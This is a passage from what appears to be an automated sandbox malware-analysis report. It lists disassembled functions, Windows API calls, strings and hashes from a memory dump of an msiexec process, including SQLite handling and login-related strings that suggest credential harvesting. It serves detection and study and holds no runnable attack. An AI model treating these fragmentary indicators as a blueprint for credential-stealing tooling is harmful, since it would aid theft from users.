                                                                                            • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                            • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                              • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                              • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                            • String ID: sysdatetimepick32
                                                                                            • API String ID: 1028950076-4169760276
                                                                                            • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                            • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                            • memset.MSVCRT ref: 0041BA3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: -journal$-wal
                                                                                            • API String ID: 438689982-2894717839
                                                                                            • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                            • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Dialog$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3975816621-0
                                                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                                                            • String ID: .save$http://$https://$log profile$signIn
                                                                                            • API String ID: 1214746602-2708368587
                                                                                            • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                            • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                            • memset.MSVCRT ref: 00405E33
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                            • String ID:
                                                                                            • API String ID: 2313361498-0
                                                                                            • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                            • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                                                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                            APIs
                                                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ItemMessageRectSend$Client
                                                                                            • String ID:
                                                                                            • API String ID: 2047574939-0
                                                                                            • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                            • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                            APIs
                                                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                            • String ID:
                                                                                            • API String ID: 4218492932-0
                                                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                            APIs
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: gj
                                                                                            • API String ID: 438689982-4203073231
                                                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                            • API String ID: 3510742995-2446657581
                                                                                            • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                            • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                            • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                            • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                            • memset.MSVCRT ref: 00405ABB
                                                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                            • SetFocus.USER32(?), ref: 00405B76
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$FocusItemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4281309102-0
                                                                                            • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                            • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                            • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscat
                                                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                            • API String ID: 384018552-4153097237
                                                                                            • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                            • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                            • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 2029023288-3849865405
                                                                                            • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                            • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                            • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                            APIs
                                                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                            • memset.MSVCRT ref: 00405455
                                                                                            • memset.MSVCRT ref: 0040546C
                                                                                            • memset.MSVCRT ref: 00405483
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy$ErrorLast
                                                                                            • String ID: 6$\
                                                                                            • API String ID: 404372293-1284684873
                                                                                            • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                            • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                            • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLastSleep$free
                                                                                            • String ID:
                                                                                            • API String ID: 1470729244-0
                                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                            APIs
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                                                            • wcscpy.MSVCRT ref: 0040A107
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                            • String ID:
                                                                                            • API String ID: 1331804452-0
                                                                                            • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                            • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                            • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                            APIs
                                                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: advapi32.dll
                                                                                            • API String ID: 2012295524-4050573280
                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                            APIs
                                                                                            Strings
                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                            • <%s>, xrefs: 004100A6
                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                            • API String ID: 3473751417-2880344631
                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2521778956-791839006
                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscpy
                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                            • API String ID: 999028693-502967061
                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 00408DFA
                                                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                            • memset.MSVCRT ref: 00408E46
                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2350177629-0
                                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                            • API String ID: 2221118986-1606337402
                                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
